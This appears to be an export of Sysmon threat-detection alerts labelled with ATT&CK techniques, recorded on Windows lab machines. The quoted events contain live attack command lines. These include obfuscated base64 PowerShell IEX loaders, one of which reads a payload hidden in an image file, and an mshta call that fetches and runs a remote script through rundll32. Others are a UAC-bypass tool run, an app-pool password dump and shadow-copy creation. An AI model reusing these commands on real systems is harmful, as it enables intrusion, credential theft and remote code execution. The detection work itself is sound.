([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""") and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 10662 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-14 11:53:29.768 747F3D96-F639-5D53-0000-0010B0FC2600 8180 C:\Windows\System32\wscript.exe 5.812.10240.16384 Microsoft ® Windows Based Script Host Microsoft ® Windows Script Host Microsoft Corporation "c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-F419-5D53-0000-002026910200 0x29126 1 Medium SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C 747F3D96-F639-5D53-0000-001092EE2600 6000 C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920558.822932,2019-05-27T05:29:18.822932+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:vdir.name ),1," 1 5 4 1 0 0x8000000000000000 5937 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:18.782 365ABB72-3D6E-5CEB-0000-00106FA6FF00 1876 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:vdir.name C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557667978.167195,2019-05-12T17:32:58.167195+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 16389 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:30:46.275 365ABB72-2006-5CD8-0000-0010E0912300 2936 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-2006-5CD8-0000-0010A2862300 2960 C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1," 1 5 4 1 0 0x8000000000000000 6180 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:47.402 365ABB72-FE6F-5CEB-0000-0010F4370C00 3448 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-FD85-5CEB-0000-00104C0E0B00 1944 C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1," 1 5 4 1 0 0x8000000000000000 6180 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:47.402 365ABB72-FE6F-5CEB-0000-0010F4370C00 3448 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-FD85-5CEB-0000-00104C0E0B00 1944 C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1558452779.769825,2019-05-21T19:32:59.769825+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( gator4243.hostgator.com ) , IP ( 108.179.232.58 ) and port ( 443 )",3," 3 5 4 3 0 0x8000000000000000 4128 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-21 06:58:39.888 365ABB72-1A29-5CE4-0000-001079F92101 2432 C:\Windows\System32\mshta.exe IEWIN7\IEUser tcp true false 10.0.2.15 IEWIN7..home 49703 false 108.179.232.58 gator4243.hostgator.com 443 https ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1556664747.588976,2019-05-01T02:52:27.588976+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1," 1 5 4 1 0 0x8000000000000000 10153 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 22:49:09.276 365ABB72-D0E5-5CC8-0000-0010DADF3E00 2892 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd C:\Windows\system32\ IEWIN7\IEUser 365ABB72-C494-5CC8-0000-0020E4FF0000 0xffe4 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-D0E4-5CC8-0000-00103CB73E00 3680 C:\Windows\Installer\MSI4FFD.tmp "C:\Windows\Installer\MSI4FFD.tmp" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920558.742817,2019-05-27T05:29:18.742817+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.password ),1," 1 5 4 1 0 0x8000000000000000 5934 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:18.702 365ABB72-3D6E-5CEB-0000-0010AFA2FF00 3812 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url)",1," 1 5 4 1 0 0x8000000000000000 16388 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:30:46.213 365ABB72-2006-5CD8-0000-0010A2862300 2960 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-1FF8-5CD8-0000-00102A342000 1332 C:\Python27\python.exe python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1," 1 5 4 1 0 0x8000000000000000 16388 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:30:46.213 365ABB72-2006-5CD8-0000-0010A2862300 2960 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-1FF8-5CD8-0000-00102A342000 1332 C:\Python27\python.exe python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1," 1 5 4 1 0 0x8000000000000000 16388 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:30:46.213 365ABB72-2006-5CD8-0000-0010A2862300 2960 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-1596-5CD8-0000-0020103A0100 0x13a10 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-1FF8-5CD8-0000-00102A342000 1332 C:\Python27\python.exe python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T1218.005 ] Mshta found running in the system,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1," 1 5 4 1 0 0x8000000000000000 4127 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-21 15:32:57.837 365ABB72-1A29-5CE4-0000-001079F92101 2432 C:\Windows\System32\mshta.exe 11.00.9600.16428 (winblue_gdr.131013-1700) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-39CC-5CE3-0000-002096C70000 0xc796 1 High SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A 365ABB72-1A29-5CE4-0000-00107BE42101 2920 C:\Windows\System32\rundll32.exe rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt ) contain suspicious command ( \mshta.exe),1," 1 5 4 1 0 0x8000000000000000 4127 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-21 15:32:57.837 365ABB72-1A29-5CE4-0000-001079F92101 2432 C:\Windows\System32\mshta.exe 11.00.9600.16428 (winblue_gdr.131013-1700) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-39CC-5CE3-0000-002096C70000 0xc796 1 High 